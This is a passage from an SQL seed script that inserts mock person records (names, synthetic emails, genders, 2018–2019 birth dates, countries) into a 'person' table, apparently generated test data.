country_of_birth) values ('Giraldo', 'Beresfore', null, 'Male', '3/14/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Antonetta', 'Cheevers', 'acheeversdf@foxnews.com', 'Female', '9/8/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Casey', 'Orth', null, 'Female', '10/18/2019', 'Belarus'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wainwright', 'Belz', 'wbelzdh@blogger.com', 'Male', '9/21/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ellsworth', 'Pietz', null, 'Male', '4/2/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Loralyn', 'Birtwell', 'lbirtwelldj@uiuc.edu', 'Female', '10/20/2019', 'Bosnia and Herzegovina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rab', 'Wheeliker', null, 'Male', '12/24/2018', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corinna', 'Sabbin', null, 'Female', '2/7/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lucas', 'Archbould', null, 'Male', '6/3/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wallace', 'Cullon', 'wcullondn@toplist.cz', 'Male', '3/13/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Corney', 'McCart', 'cmccartdo@amazon.com', 'Male', '9/7/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Albina', 'Chuck', 'achuckdp@ucoz.com', 'Female', '12/30/2018', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Caralie', 'Hamlington', null, 'Female', '7/13/2019', 'Iran'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ferguson', 'Whibley', 'fwhibleydr@bluehost.com', 'Male', '6/15/2019', 'Faroe Islands'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ellie', 'Riccard', 'ericcardds@blog.com', 'Female', '5/26/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dorie', 'Grimmert', 'dgrimmertdt@infoseek.co.jp', 'Male', '10/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ameline', 'Di Roberto', 'adirobertodu@slate.com', 'Female', '12/24/2018', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Earvin', 'Doogood', 'edoogooddv@baidu.com', 'Male', '7/2/2019', 'Bangladesh'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Barbee', 'Staton', 'bstatondw@auda.org.au', 'Female', '6/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Marthe', 'Jillitt', 'mjillittdx@eventbrite.com', 'Female', '11/9/2019', 'Bangladesh'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jo-ann', 'Towl', null, 'Female', '12/20/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clarke', 'Ottam', 'cottamdz@hatena.ne.jp', 'Male', '6/21/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Staci', 'Polkinhorn', 'spolkinhorne0@webnode.com', 'Female', '5/1/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fabian', 'Kleinpeltz', 'fkleinpeltze1@seesaa.net', 'Male', '10/24/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Josepha', 'Millis', 'jmillise2@xrea.com', 'Female', '3/15/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aloysius', 'Missington', 'amissingtone3@naver.com', 'Male', '11/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ab', 'Newlan', null, 'Male', '4/3/2019', 'Greece'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wilona', 'Ernke', null, 'Female', '1/13/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dorie', 'Meakin', 'dmeakine6@state.gov', 'Female', '1/24/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Quillan', 'Wasselin', 'qwasseline7@fema.gov', 'Male', '7/8/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Balduin', 'Bickford', 'bbickforde8@craigslist.org', 'Male', '2/27/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rudie', 'Del Monte', 'rdelmontee9@a8.net', 'Male', '10/9/2019', 'Germany'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Yul', 'Halbert', null, 'Male', '2/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Glendon', 'Eates', null, 'Male', '4/15/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Misty', 'Surmon', null, 'Female', '11/17/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Osborn', 'Erat', null, 'Male', '12/14/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lissi', 'Fossord', 'lfossordee@netlog.com', 'Female', '11/2/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Chrissie', 'Gulliman', null, 'Female', '12/22/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Randy', 'Penkethman', null, 'Male', '12/31/2018', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Leanna', 'Powles', 'lpowleseh@w3.org', 'Female', '8/17/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vassily', 'Hauxwell', 'vhauxwellei@dmoz.org', 'Male', '11/26/2019', 'Pitcairn'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Glenden', 'Spread', null, 'Male', '1/17/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Faydra', 'Travers', 'ftraversek@soup.io', 'Female', '7/9/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vale', 'MacNeish', null, 'Male', '5/7/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alia', 'Apfel', null, 'Female', '4/30/2019', 'Morocco'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shel', 'Kohtler', 'skohtleren@google.com', 'Female', '4/22/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cammy', 'O''Caherny', null, 'Male', '3/14/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Margot', 'Chapling', null, 'Female', '10/15/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Karlis', 'Abrahamoff', 'kabrahamoffeq@usgs.gov', 'Male', '8/30/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Odelia', 'Nairne', null, 'Female', '12/9/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Denis', 'Hanscomb', 'dhanscombes@patch.com', 'Male', '8/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jerry', 'Vondracek', 'jvondraceket@engadget.com', 'Male', '11/1/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Analiese', 'Slowcock', 'aslowcockeu@taobao.com', 'Female', '3/19/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Odille', 'Mottini', 'omottiniev@tamu.edu', 'Female', '7/20/2019', 'Guadeloupe'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ossie', 'Gout', 'ogoutew@cam.ac.uk', 'Male', '6/9/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Leodora', 'Iacobo', 'liacoboex@phoca.cz', 'Female', '3/1/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kirsteni', 'Tace', null, 'Female', '9/4/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wayland', 'Paffett', null, 'Male', '3/25/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wayne', 'Feetham', 'wfeethamf0@altervista.org', 'Male', '3/26/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Norina', 'Meah', null, 'Female', '8/9/2019', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Buddie', 'Phillps', 'bphillpsf2@umn.edu', 'Male', '9/27/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fianna', 'Buttel', null, 'Female', '10/14/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Trula', 'Toner', null, 'Female', '11/8/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Web', 'Saipy', 'wsaipyf5@ucoz.com', 'Male', '3/4/2019', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gaby', 'Stratten', 'gstrattenf6@cisco.com', 'Female', '5/14/2019', 'Guinea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berk', 'Faraker', 'bfarakerf7@redcross.org', 'Male', '3/15/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Barb', 'Mumbray', 'bmumbrayf8@washington.edu', 'Female', '1/10/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Genovera', 'Whaley', null, 'Female', '7/20/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hurleigh', 'Marl', 'hmarlfa@wikipedia.org', 'Male', '8/6/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cris', 'Deekes', null, 'Female', '4/15/2019', 'Zambia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Beverlie', 'Mepham', 'bmephamfc@multiply.com', 'Female', '6/15/2019', 'Croatia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wilbert', 'Windous', 'wwindousfd@wsj.com', 'Male', '10/18/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dermot', 'Trorey', 'dtroreyfe@un.org', 'Male', '3/28/2019', 'Finland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cleveland', 'Assiratti', 'cassirattiff@netlog.com', 'Male', '8/31/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Hannah', 'Gowrich', 'hgowrichfg@alibaba.com', 'Female', '5/22/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nata', 'Culverhouse', null, 'Female', '5/9/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Colline', 'Daveley', 'cdaveleyfi@mac.com', 'Female', '5/24/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Derry', 'Aidler', null, 'Male', '10/27/2019', 'Kenya'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Shalom', 'Jako', 'sjakofk@angelfire.com', 'Male', '11/21/2019', 'Argentina'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Etan', 'Clerke', 'eclerkefl@toplist.cz', 'Male', '3/21/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Emlynn', 'Barme', 'ebarmefm@fc2.com', 'Female', '10/15/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tera', 'Gligorijevic', 'tgligorijevicfn@quantcast.com', 'Female', '2/28/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Viki', 'Kiljan', 'vkiljanfo@hhs.gov', 'Female', '2/17/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rufus', 'Glassborow', 'rglassborowfp@google.com.hk', 'Male', '8/7/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Delphinia', 'Ireson', null, 'Female', '9/21/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tommi', 'Trodd', 'ttroddfr@de.vu', 'Female', '10/13/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Maitilde', 'McReynolds', 'mmcreynoldsfs@networkadvertising.org', 'Female', '4/25/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Deana', 'Jacobovitch', 'djacobovitchft@cornell.edu', 'Female', '4/17/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pauletta', 'Romney', 'promneyfu@vk.com', 'Female', '7/25/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Herschel', 'Brickstock', 'hbrickstockfv@facebook.com', 'Male', '8/13/2019', 'Syria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dora', 'Gealy', null, 'Female', '12/1/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berni', 'Stennard', null, 'Female', '11/19/2019', 'Latvia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vere', 'Kaaskooper', 'vkaaskooperfy@php.net', 'Female', '8/31/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ronnie', 'Pickerin', 'rpickerinfz@uiuc.edu', 'Male', '2/24/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Harlan', 'Lygoe', null, 'Male', '7/1/2019', 'Germany'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Northrop', 'Livezey', null, 'Male', '2/5/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pearle', 'Speare', 'pspeareg2@hatena.ne.jp', 'Female', '9/16/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Dyann', 'Sutherns', 'dsuthernsg3@ow.ly', 'Female', '8/27/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carry', 'Snaden', 'csnadeng4@acquirethisname.com', 'Female', '5/13/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Trudy', 'Dibling', 'tdiblingg5@nature.com', 'Female', '12/28/2018', 'Guatemala'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Pearl', 'Shillan', 'pshillang6@geocities.com', 'Female', '7/2/2019', 'Saudi Arabia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Bertrando', 'Braunton', 'bbrauntong7@omniture.com', 'Male', '10/17/2019', 'Azerbaijan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Elna', 'Elecum', 'eelecumg8@mit.edu', 'Female', '1/14/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Doti', 'McLennan', 'dmclennang9@uol.com.br', 'Female', '1/29/2019', 'Colombia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stuart', 'Campaigne', null, 'Male', '6/2/2019', 'Portugal'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Maurizio', 'MacDuffie', null, 'Male', '9/7/2019', 'Nigeria'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Emile', 'Whimpenny', 'ewhimpennygc@si.edu', 'Male', '10/26/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Forest', 'Wallen', 'fwallengd@sogou.com', 'Male', '3/30/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lorianna', 'Angear', null, 'Female', '1/25/2019', 'Sri Lanka'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darsie', 'Labroue', 'dlabrouegf@yandex.ru', 'Female', '11/12/2019', 'Tanzania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Glad', 'Dankersley', 'gdankersleygg@facebook.com', 'Female', '4/14/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Trix', 'Mintram', 'tmintramgh@fema.gov', 'Female', '6/17/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Harmon', 'Caffery', 'hcafferygi@nsw.gov.au', 'Male', '6/25/2019', 'Sweden'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Darn', 'Ruttgers', 'druttgersgj@etsy.com', 'Male', '5/17/2019', 'Chad'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wiley', 'MacEnelly', 'wmacenellygk@illinois.edu', 'Male', '9/6/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cole', 'Costa', 'ccostagl@kickstarter.com', 'Male', '8/26/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Melisse', 'Alchin', 'malchingm@facebook.com', 'Female', '4/8/2019', 'Pakistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Alwyn', 'Adger', 'aadgergn@bbc.co.uk', 'Male', '3/26/2019', 'Serbia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Basia', 'Smedley', null, 'Female', '8/31/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Audry', 'Niblo', null, 'Female', '12/22/2018', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Craggie', 'Gavahan', 'cgavahangq@pbs.org', 'Male', '1/30/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Townsend', 'Frede', null, 'Male', '3/7/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nomi', 'Pelerin', null, 'Female', '1/26/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Vivien', 'Rowcastle', null, 'Female', '12/5/2018', 'Afghanistan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Rustin', 'Boyson', 'rboysongu@cornell.edu', 'Male', '5/8/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gerhard', 'Stodit', 'gstoditgv@mac.com', 'Male', '7/21/2019', 'Slovenia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gabriellia', 'Seary', null, 'Female', '7/13/2019', 'Cuba'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Fairleigh', 'Boyd', 'fboydgx@ehow.com', 'Male', '12/24/2018', 'Palestinian Territory'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kristina', 'Mc Caughan', 'kmccaughangy@diigo.com', 'Female', '7/19/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Feliks', 'Francello', 'ffrancellogz@walmart.com', 'Male', '12/23/2018', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Keir', 'Arblaster', null, 'Male', '3/27/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Katy', 'Sylvaine', 'ksylvaineh1@toplist.cz', 'Female', '11/5/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lou', 'Fitzharris', 'lfitzharrish2@mozilla.org', 'Male', '12/14/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Deva', 'Riseborough', null, 'Female', '1/4/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cristionna', 'Hewes', null, 'Female', '3/24/2019', 'Cuba'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cletis', 'Poytres', null, 'Male', '8/14/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Laurent', 'Wooding', 'lwoodingh6@amazon.co.uk', 'Male', '10/4/2019', 'New Zealand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Devin', 'Boanas', 'dboanash7@independent.co.uk', 'Male', '11/29/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aileen', 'Abrahim', null, 'Female', '4/13/2019', 'Sri Lanka'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Franklyn', 'Louys', null, 'Male', '5/1/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jamesy', 'Oles', 'jolesha@nydailynews.com', 'Male', '3/3/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Clyde', 'Yonnie', null, 'Male', '1/2/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Aldus', 'Faithfull', 'afaithfullhc@intel.com', 'Male', '7/27/2019', 'Canada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Neddie', 'Richardes', null, 'Male', '4/4/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Lynnett', 'Atwool', null, 'Female', '2/6/2019', 'South Korea'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Melina', 'Ashwin', 'mashwinhf@cnbc.com', 'Female', '3/15/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garrek', 'Jovic', 'gjovichg@zdnet.com', 'Male', '7/20/2019', 'Ethiopia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Holly', 'O''Dougherty', null, 'Male', '1/23/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Mirabella', 'Dorricott', 'mdorricotthi@forbes.com', 'Female', '12/24/2018', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Edward', 'Sterricker', 'esterrickerhj@ftc.gov', 'Male', '8/11/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Garrott', 'Cauldfield', 'gcauldfieldhk@ifeng.com', 'Male', '4/12/2019', 'Palestinian Territory'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Luce', 'Overshott', 'lovershotthl@whitehouse.gov', 'Female', '9/23/2019', 'United States'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robby', 'Whyard', null, 'Female', '4/13/2019', 'Kazakhstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Malachi', 'Whalley', 'mwhalleyhn@geocities.jp', 'Male', '10/20/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nikola', 'Du Plantier', null, 'Male', '5/24/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Christian', 'Hitcham', null, 'Male', '1/22/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Julianna', 'Lukianov', 'jlukianovhq@trellian.com', 'Female', '2/11/2019', 'France'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Wendall', 'Brownill', 'wbrownillhr@usa.gov', 'Male', '5/6/2019', 'Peru'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Minette', 'Petyt', 'mpetyths@weibo.com', 'Female', '2/14/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Jere', 'Lambarton', null, 'Female', '4/30/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ilyse', 'Kenforth', 'ikenforthhu@house.gov', 'Female', '8/10/2019', 'Italy'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Stirling', 'Poschel', null, 'Male', '12/4/2018', 'Honduras'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nedi', 'Wadelin', 'nwadelinhw@bloglines.com', 'Female', '8/26/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Danie', 'Cornfoot', 'dcornfoothx@hud.gov', 'Male', '3/31/2019', 'Ivory Coast'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sherm', 'Binford', 'sbinfordhy@discuz.net', 'Male', '4/17/2019', 'Czech Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Efrem', 'Stower', 'estowerhz@edublogs.org', 'Male', '12/26/2018', 'Kyrgyzstan'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sella', 'Dot', 'sdoti0@businessinsider.com', 'Female', '5/3/2019', 'Grenada'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Sean', 'Pedrazzi', 'spedrazzii1@sitemeter.com', 'Male', '4/17/2019', 'Ukraine'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Melly', 'Thompson', 'mthompsoni2@addthis.com', 'Female', '7/22/2019', 'Malaysia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ciel', 'Toppas', 'ctoppasi3@eepurl.com', 'Female', '9/10/2019', 'Russia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cobby', 'Hewson', 'chewsoni4@netscape.com', 'Male', '10/11/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Tammie', 'Cattach', 'tcattachi5@feedburner.com', 'Male', '4/22/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Kippy', 'Callendar', 'kcallendari6@live.com', 'Female', '2/21/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Berte', 'Broome', null, 'Female', '5/25/2019', 'Croatia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Idell', 'Limpkin', 'ilimpkini8@furl.net', 'Female', '5/19/2019', 'Philippines'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Gisella', 'Timcke', 'gtimckei9@geocities.jp', 'Female', '5/29/2019', 'Tanzania'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Anderson', 'Knowler', 'aknowleria@facebook.com', 'Male', '4/20/2019', 'Poland'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Ermin', 'Justis', 'ejustisib@ycombinator.com', 'Male', '1/18/2019', 'Thailand'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Boniface', 'Burditt', 'bburdittic@angelfire.com', 'Male', '2/11/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cherianne', 'Duckett', 'cduckettid@angelfire.com', 'Female', '7/12/2019', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Skipton', 'Izakov', 'sizakovie@123-reg.co.uk', 'Male', '8/4/2019', 'Dominican Republic'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Nickey', 'Danilenko', 'ndanilenkoif@shutterfly.com', 'Male', '8/15/2019', 'Vietnam'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Molli', 'Spurdens', 'mspurdensig@acquirethisname.com', 'Female', '12/17/2018', 'China'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Robbie', 'Toppas', 'rtoppasih@prnewswire.com', 'Male', '8/28/2019', 'Indonesia'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Cad', 'MacConnal', 'cmacconnalii@ebay.com', 'Male', '2/10/2019', 'Brazil'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Joshia', 'Albany', 'jalbanyij@ihg.com', 'Male', '11/12/2019', 'Mexico'); -insert into person (first_name, last_name, email, gender, date_of_birth, country_of_birth) values ('Carlin', 'Kynder', 'ckynderik@ameblo.jp', 